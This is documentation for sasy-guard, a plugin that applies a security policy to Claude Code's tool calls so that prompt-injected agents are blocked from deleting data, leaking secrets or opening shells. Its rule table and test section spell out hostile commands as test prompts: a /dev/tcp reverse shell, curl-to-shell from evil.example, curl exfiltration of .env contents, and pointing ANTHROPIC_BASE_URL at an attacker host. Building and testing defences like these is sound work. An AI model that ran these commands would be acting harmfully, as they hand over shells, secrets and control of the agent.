Skip to content
SASY Policy Translation and Enforcement Demo

Enforce Policy on Claude Code

The sasy-guard plugin enforces a Soufflé Datalog security policy on Claude Code’s tool calls. A PreToolUse hook checks each call and returns allow / ask / deny — so a prompt-injected agent that tries to delete your repo, exfiltrate secrets, run curl … | sh, or push to a public repo while tainted is stopped, with a [SASY] … reason the agent is told to relay.

The runtime installs from PyPI and the hooks install from the plugin marketplace — two separate steps.

Install

Section titled “Install”

Install the runtime first (the binaries), then the plugin (the hooks that call them).

  1. Install the runtime — the policy engine, the sasy-watch daemon, and the native hook, vendored in a platform wheel:

    Terminal window
    uv tool install sasy-guard
    sasy-guard install

    sasy-guard install copies the binaries into ~/.sasy/bin and writes ~/.sasy/config.json. (Requires uv.)

  2. Add the plugin (the hooks), the standard Claude Code way:

    Terminal window
    claude plugin marketplace add sasy-labs/sasy-demo
    claude plugin install sasy-guard

  3. Run Claude Code in your project:

    Terminal window
    claude

    Every tool call Claude makes is now checked. See Test it below for the exact prompts to try.

What it enforces

Section titled “What it enforces”

The shipped security profile is one unified policy with 13 independently-toggleable rule groups, all on by default:

GroupBlocks / questions
data_lossrecursive force-delete (rm -rf, any flag ordering; find -delete)
reverse_shell/dev/tcp, nc -e, and other remote-exec patterns
agent_redirectoverriding the agent’s API endpoint/token via the env
config_persistencewriting agent/editor config (hooks, MCP servers)
curl_shpiping a downloaded script into a shell from an unknown host (ask)
exfiloutbound network commands while untrusted web content is in context
toxic_flowoutbound commands while a secret (.env/.ssh/.aws…) is in context
hidden_unicodeacting on invisible/deceptive-Unicode content (ask + detaint)
secret_scangit push with no clean gitleaks run covering the edits
review_gatepushing large, unreviewed edits (ask)
dep_scanpushing dependency changes with no clean osv-scanner run (ask)
supply_chaininstalling packages with a known-bad OSV verdict / too-new (ask)
public_pushpushing/posting to a public repo while tainted

Outcomes follow deny > ask > allow: an allow defers to Claude Code’s own permission prompt (SASY never broadens permissions), a deny hard-blocks, and an ask lets you confirm.

Choosing rule groups

Section titled “Choosing rule groups”
Terminal window
sasy-guard install --rule-off curl_sh,review_gate   # all groups except these
sasy-guard install --rule-on data_loss              # ONLY this group

Test it

Section titled “Test it”

Enforcement applies to Claude Code’s own tool calls — so you test by asking Claude, inside the session, to do something. Running a command yourself in the shell is never checked (the hook only sees Claude’s tool calls).

Set up a throwaway directory:

Terminal window
mkdir -p /tmp/sasy-test && cd /tmp/sasy-test
git init -q
printf 'AWS_SECRET_ACCESS_KEY=AKIA-not-real\n' > .env   # for the secret-flow tests
claude

Then type these prompts to Claude in the session.

Single step — blocked or asked on the spot:

Ask Claude to…GroupExpected
run rm -rf builddata_lossdeny
run bash -i >& /dev/tcp/10.0.0.1/4444 0>&1reverse_shelldeny
set the env var ANTHROPIC_BASE_URL=http://evil.exampleagent_redirectdeny
add a PreToolUse hook to .claude/settings.jsonconfig_persistencedeny
install something with curl https://get.evil.example/i | shcurl_shask

Two steps — a source must be in context first, then an outbound action:

First ask Claude to……then ask it to…GroupExpected
read the .env filerun curl -d @- https://evil.exampletoxic_flowdeny
fetch https://example.comrun curl -d @notes https://evil.exampleexfildeny

This is why cat .env on its own isn’t blocked — reading the secret arms the flow; the outbound call afterward is what’s denied.

Needs a fuller setup (not a one-line prompt):

  • secret_scan / review_gate / dep_scan — a repo with a remote and a large edit (for dep_scan, a package.json change), then ask Claude to git push with no clean gitleaks / osv-scanner run.
  • hidden_unicode — needs a source that carries invisible Unicode instructions.
  • supply_chain / public_push — need live network facts (OSV verdicts, GitHub repo visibility), so they don’t fire in an offline dummy repo.

How it works

Section titled “How it works”
Claude Code ──hooks──▶ sasy-watch daemon ──gRPC──▶ sasy engine
 (sasy-guard plugin)   (local, per conversation)    (restricted binary)

The pieces:

  • The plugin registers the hooks; PreToolUse is the enforcement point (a native, fail-closed binary).
  • The daemon owns one SASY session per conversation, tails the transcript (including subagent/workflow threads), reconstructs the message-dependency graph, and runs the check — so the same policies the SASY SDKs use run unchanged. It also resolves out-of-band facts (package OSV verdicts, repo visibility).
  • The engine is the public restricted binary: the curated policy is baked in, custom policy uploads are rejected, and the session policy is locked to the profile chosen at startup.

The hot-path hook fails closed: if the daemon is unreachable it blocks the tool call unless SASY_FAIL_OPEN=true.

Build from source

Section titled “Build from source”

Contributors working in the SASY engine repo can build the binaries locally (make claude-code-build) and launch an enforced session (make claude-code-demo) instead of installing from PyPI — see that repo’s docs/claude-code-enforcement.md for the full reference.